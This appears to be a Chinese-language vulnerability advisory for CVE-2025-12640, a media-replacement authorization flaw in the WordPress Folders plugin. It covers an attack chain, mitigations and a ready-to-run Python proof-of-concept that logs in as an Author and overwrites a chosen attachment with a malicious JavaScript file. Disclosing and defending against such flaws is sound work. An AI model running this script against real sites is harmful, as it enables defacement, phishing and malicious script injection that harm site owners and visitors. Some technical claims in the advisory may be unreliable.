CVE-2025-12640 WordPress Folders插件未授权媒体文件替换漏洞

漏洞信息

漏洞编号

CVE-2025-12640

漏洞类型

越权访问

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager (WordPress插件)

漏洞概述

CVE-2025-12640是WordPress平台上一款名为Folders的媒体库文件夹管理插件存在的安全漏洞。该插件被广泛应用于WordPress网站中，用于帮助管理员组织和管理媒体库中的文件、页面、帖子等资源。然而，在3.1.5及以下所有版本中，由于handle_folders_file_upload()函数缺少对象级别的授权检查，导致存在严重的越权访问问题。攻击者只需拥有Author（作者）级别或更高的账户权限，即可利用此漏洞对WordPress媒体库中的任意文件进行替换操作。这种未授权的媒体替换可能引发多种安全风险，包括但不限于：替换网站Logo或品牌图片进行钓鱼攻击、植入恶意代码到JavaScript或图片文件中、破坏网站内容完整性、以及通过替换插件或主题资源文件实现进一步的攻击利用。该漏洞的CVSS评分为4.3，属于中等严重程度，但考虑到其利用门槛较低且可能造成的严重影响，仍需引起高度重视。建议所有使用该插件的WordPress站点管理员尽快采取修复措施。

技术细节

该漏洞的根本原因在于Folders插件的handle_folders_file_upload()函数在处理文件上传请求时，未能正确验证当前用户是否具有对目标媒体文件的修改权限。在WordPress的权限体系中，媒体库文件通常与上传者关联，其他用户不应具有修改权限。然而，该插件的实现中仅检查了用户是否具有Author级别的访问权限，而未验证用户与目标文件之间的所有权关系或权限关联。攻击者可以通过构造特定的API请求，指定要替换的目标媒体文件ID，并上传新的文件内容。插件会直接覆盖原文件，而不进行额外的权限校验。攻击者可以利用WordPress的REST API或AJAX端点发送恶意请求，在请求中包含目标附件ID和伪造的文件数据。由于插件直接调用WordPress的核心函数wp_handle_upload()处理文件，攻击者可以绕过常规的上传限制（如文件类型检查），实现任意文件类型的上传和替换。这种设计缺陷使得低权限用户能够执行本应需要管理员权限的操作，严重违反了最小权限原则。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress账户：攻击者首先需要在目标WordPress站点注册一个具有Author（作者）级别或更高权限的账户。这可以通过正常注册流程、社工手段或其他方式实现。

STEP 2

步骤2

识别目标媒体文件：攻击者登录后，浏览WordPress媒体库，识别需要替换的目标文件（如网站Logo、主题资源文件或JavaScript文件），并记录该文件的附件ID。

STEP 3

步骤3

构造恶意请求：攻击者构造一个特制的文件上传请求，目标是利用Folders插件的handle_folders_file_upload()函数。请求中包含目标附件ID作为folder_id参数，以及恶意文件内容。

STEP 4

步骤4

发送漏洞利用请求：攻击者通过WordPress的AJAX端点（admin-ajax.php）发送构造的请求，由于插件缺少对象级授权检查，请求会被直接处理。

STEP 5

步骤5

文件替换成功：插件调用wp_handle_upload()函数，将恶意文件保存并覆盖原媒体文件。整个过程无需验证用户与原文件的所有权关系。

STEP 6

步骤6

攻击效果达成：被替换的文件可能包含恶意JavaScript代码、钓鱼内容或其他攻击载荷，当其他用户访问时会触发相应的攻击行为。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
from urllib.parse import urlencode

# CVE-2025-12640 PoC - Unauthorized Media Replacement
# Target: WordPress Folders Plugin <= 3.1.5

def exploit_cve_2025_12640(target_url, username, password, target_attachment_id, malicious_file_path):
    """
    Exploit for CVE-2025-12640: Unauthorized Arbitrary Media Replacement
    
    Args:
        target_url: Target WordPress site URL
        username: WordPress user with Author-level access
        password: User password
        target_attachment_id: ID of the media file to replace
        malicious_file_path: Path to the malicious file to upload
    """
    
    session = requests.Session()
    
    # Step 1: Login to WordPress
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{target_url}/wp-admin/",
        'testcookie': '1'
    }
    
    response = session.post(login_url, data=login_data, allow_redirects=True)
    
    if 'wordpress_logged_in' not in str(session.cookies):
        print("[-] Login failed")
        return False
    
    print("[+] Login successful")
    
    # Step 2: Read malicious file content
    try:
        with open(malicious_file_path, 'rb') as f:
            file_content = f.read()
    except Exception as e:
        print(f"[-] Failed to read malicious file: {e}")
        return False
    
    # Step 3: Exploit the vulnerability via AJAX endpoint
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Prepare the malicious file for upload
    files = {
        'file': ('malicious.js', file_content, 'application/javascript')
    }
    
    # Key parameter: folder_id with target attachment ID
    data = {
        'action': 'folders_handle_file_upload',
        'folder_id': target_attachment_id,  # Target attachment ID to replace
        'is_featured': '0',
        'post_id': '0'
    }
    
    response = session.post(ajax_url, data=data, files=files)
    
    if response.status_code == 200:
        result = response.json() if response.headers.get('content-type', '').find('json') != -1 else response.text
        print(f"[+] Exploitation attempt completed")
        print(f"[+] Response: {result}")
        return True
    else:
        print(f"[-] Exploitation failed with status code: {response.status_code}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 6:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <attachment_id> <malicious_file>")
        print(f"Example: python {sys.argv[0]} http://target.com admin password 123 malicious.js")
        sys.exit(1)
    
    target_url = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    attachment_id = sys.argv[4]
    malicious_file = sys.argv[5]
    
    exploit_cve_2025_12640(target_url, username, password, attachment_id, malicious_file)

影响范围

Folders插件 <= 3.1.5 (所有受影响的版本)

防御指南

临时缓解措施

在无法立即升级插件的情况下，可以采取以下临时缓解措施：1) 临时禁用Folders插件，待官方修复版本发布后再启用；2) 限制Author级别用户的编辑和上传权限，只保留最低必要权限；3) 对媒体库实施严格的访问控制，限制非管理员用户修改现有媒体文件；4) 启用Wordfence等安全插件的防火墙规则，对异常的文件上传行为进行监控和阻断；5) 考虑使用WordPress的文件完整性监控功能，及时发现未授权的文件修改行为。